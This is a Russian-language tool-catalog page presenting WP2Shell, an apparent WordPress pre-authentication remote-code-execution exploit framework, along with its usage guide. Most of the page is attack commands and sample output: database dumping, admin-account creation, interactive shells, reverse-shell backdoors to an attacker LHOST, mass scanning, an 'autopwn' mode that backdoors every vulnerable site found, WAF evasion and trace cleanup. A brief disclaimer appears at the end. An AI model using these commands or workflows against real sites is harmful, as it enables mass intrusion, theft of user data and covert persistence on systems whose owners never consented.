Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/g0d150ne/wp2shell
Фреймворки для пентестаРазведкаСканеры уязвимостейФреймворки для эксплойтовМеханизмы персистентностиЭксплуатацияЭксплуатация веб-приложенийОбход WAFИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHub
729 дней назадЕщё не проверено
g0d150ne/wp2shell

WP2Shell

Модульный эксплойт-фреймворк WordPress для атак до аутентификации, объединяющий SQL-инъекции и обход аутентификации для обеспечения удалённого выполнения кода, интерактивных оболочек, бэкдоров и массового сканирования уязвимостей.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

WP2Shell — эксплойт RCE до аутентификации для WordPress

CVE-2026-63030 + CVE-2026-60137
Версия: 4.0.0
Автор: G0D150NE

📌 Обзор

WP2Shell — это инструмент, реализующий полную цепочку эксплуатации WordPress для удалённого выполнения кода (RCE) до аутентификации. Он объединяет две критические уязвимости:

  • CVE-2026-63030 — SQL-инъекция в конечной точке Batch REST API
  • CVE-2026-60137 — обход аутентификации через отравление кэша oEmbed

Этот инструмент позволяет полностью скомпрометировать уязвимые установки WordPress без какой-либо аутентификации — от обнаружения до полного RCE и закрепления в системе.

⚡ Возможности

  • 🔍 Неразрушающая проверка — безопасное подтверждение уязвимости
  • 📊 Извлечение данных несколькими техниками — UNION, Error-based, Blind SQLi
  • 🚀 Полная цепочка RCE — от SQLi до создания учётной записи администратора
  • 🐚 Развёртывание веб-шелла — скрытый бэкдор на основе плагина
  • 🧹 Очистка следов — удаление всех признаков вмешательства
  • 📡 Массовое сканирование — многопоточный сканер для множества целей
  • 🤖 Режим Autopwn — обнаружение поддоменов + автоматическая эксплуатация
  • 🌐 Ротация прокси — поддержка сменяемых прокси
  • 🕵️ Стелс-режим — случайные задержки и техники обхода WAF

🔧 Установка

root@kitploit:~
# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell

# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py

🎯 Использование

Структура команды

root@kitploit:~
python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]

Доступные команды

КомандаОписание
checkНеразрушающее подтверждение уязвимости
readИзвлечение данных через SQL-инъекцию
exploitПолная цепочка RCE до аутентификации
shellРазвёртывание веб-шелла с существующими учётными данными
masscanМассовое сканирование множества целей
autopwnАвтоматическое обнаружение → сканирование → эксплуатация

🚀 Примеры

1. Проверка уязвимости

root@kitploit:~
python3 wp2shell.py check https://target.com
root@kitploit:~
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5

2. Извлечение данных

Базовый fingerprint:

root@kitploit:~
python3 wp2shell.py read https://target.com

Извлечение пользователей:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset users

Произвольный запрос:

root@kitploit:~
python3 wp2shell.py read https://target.com --query "SELECT @@version"

Дамп всей базы данных:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096

3. Полная эксплуатация

Базовая эксплуатация:

root@kitploit:~
python3 wp2shell.py exploit https://target.com

Эксплуатация с интерактивным шеллом:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --interactive

Эксплуатация с установкой бэкдора:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444

Эксплуатация с дампом базы данных:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --dumpdb

Эксплуатация с очисткой (удаление следов):

root@kitploit:~
python3 wp2shell.py exploit https://target.com --cleanup

4. Использование существующих учётных данных администратора

root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"

5. Массовое сканирование

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv

6. Режим Autopwn (полная автоматизация)

root@kitploit:~
python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100

Этот режим:

  1. Обнаруживает поддомены через crt.sh
  2. Определяет установки WordPress
  3. Эксплуатирует все уязвимые сайты
  4. Устанавливает бэкдоры на успешно скомпрометированные цели

🎮 Интерактивный шелл

После эксплуатации вы получаете полноценный интерактивный шелл:

root@kitploit:~
python3 wp2shell.py exploit https://target.com -i
root@kitploit:~
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit

🛡️ Справочник опций

Общие опции

ОпцияОписание
--timeoutHTTP-таймаут в секундах (по умолчанию: 30)
--proxiesСписок прокси через запятую (например, http://127.0.0.1:8080)
--stealthВключить стелс-режим со случайными задержками
-v, --verboseВключить отладочный вывод
-q, --quietПодавить баннер и информационные сообщения

Опции команды read

ОпцияОписание
--prefixПрефикс таблиц (по умолчанию: wp_)
--auto-prefixАвтоматическое определение префикса таблиц
--max-lengthМаксимум символов на значение (по умолчанию: 128)
--techniqueТехника извлечения: auto/union/error/blind
--presetПресет данных: fingerprint/users/dumpall
--queryПроизвольное SQL-выражение для извлечения

Опции команды exploit

ОпцияОписание
--prefixПрефикс таблиц (по умолчанию: wp_)
--no-discoverПропустить автоматическое обнаружение, использовать значения по умолчанию
-i, --interactiveОткрыть интерактивный шелл после эксплуатации
-c, --commandВыполнить одну команду после эксплуатации
--backdoorУстановить бэкдор для сохранения доступа
--lhostLHOST для reverse-шелла (по умолчанию: 10.0.0.1)
--lportLPORT для reverse-шелла (по умолчанию: 4444)
--dumpdbСделать дамп базы данных после эксплуатации
--cleanupУдалить созданного пользователя и веб-шелл при выходе

🔬 Технические подробности

Цепочка уязвимостей

  1. SQL-инъекция (CVE-2026-63030)

    • Возникает в конечной точке /wp-json/batch/v1
    • Параметр author_exclude уязвим к слепой SQL-инъекции на основе времени (time-based blind SQLi)
    • Позволяет извлечение данных через UNION и на основе ошибок
  2. Обход аутентификации (CVE-2026-60137)

    • Отравление кэша oEmbed через параметр /_embed
    • Позволяет создавать учётные записи администратора через changeset кастомайзера
    • Запускает цепочку повторного входа для создания привилегированной учётной записи

Поддерживаемые версии WordPress

ВерсияСтатус
6.9.0✅ Уязвимая
6.9.1✅ Уязвимая
6.9.2✅ Уязвимая
6.9.3✅ Уязвимая
6.9.4✅ Уязвимая
7.0.0✅ Уязвимая
7.0.1✅ Уязвимая
≥ 7.0.2❌ Исправлена

Техники извлечения данных

ТехникаСкоростьОбъём данныхТребования
UNION⚡ Очень высокаяБез ограниченийЦель не должна фильтровать UNION
Error🚀 Высокая~30 символов/запросЦель должна отображать сообщения об ошибках
Blind🐢 НизкаяБез ограниченийДоступен булевый оракул

📊 Примеры вывода

Успешная эксплуатация

root@kitploit:~
░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░      ░▒▓█▓▒░        
                                                                                                                                                                                                                            
  CVE-2026-63030 + CVE-2026-60137
  WordPress Pre-Auth RCE  [v4.0.0]
  + G0D150NE

[1/7] Reconnaissance
  Target: https://target.com
  WordPress 6.9.3
[+] UNION extraction available (in-band, 1 request/value)

[2/7] Enumerating target
[+] Discovered table prefix: wp_

[3/7] Locating embed target
[+] Embed URL: https://target.com/2020/01/01/hello-world/

[4/7] Seeding oEmbed cache posts
[+] Seed payload delivered

[5/7] Extracting cache post IDs
[+] Cache IDs: [12345, 12346, 12347, 12348]

[6/7] Triggering escalation chain
[+] Administrator created via re-entry chain

[7/7] Deploying webshell
[+] Authenticated
[+] RCE confirmed
  uid: www-data

[+] ========================================================
[+]   TARGET COMPROMISED
[+]   Admin:  wp_service_a1b2 / G7hK9xQw2p$L!mN
[+]   Shell:  https://target.com/wp-content/plugins/cache_a1b2/cache_a1b2.php
[+] ========================================================

⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Использование против систем без явного разрешения незаконно. Авторы не несут ответственности за любое неправомерное использование.

📚 Ссылки

  • CVE-2026-63030
  • CVE-2026-60137
  • Консультация по безопасности WordPress
  • Технический блог WP2Shell

🤝 Участие в разработке

Нашли ошибку? Хотите улучшить инструмент? Pull request'ы приветствуются!

  1. Сделайте форк репозитория
  2. Создайте ветку для вашей функции
  3. Зафиксируйте свои изменения (commit)
  4. Запушьте изменения в ветку
  5. Откройте Pull Request

📄 Лицензия

Лицензия MIT — подробности см. в файле LICENSE.

Скачать инструмент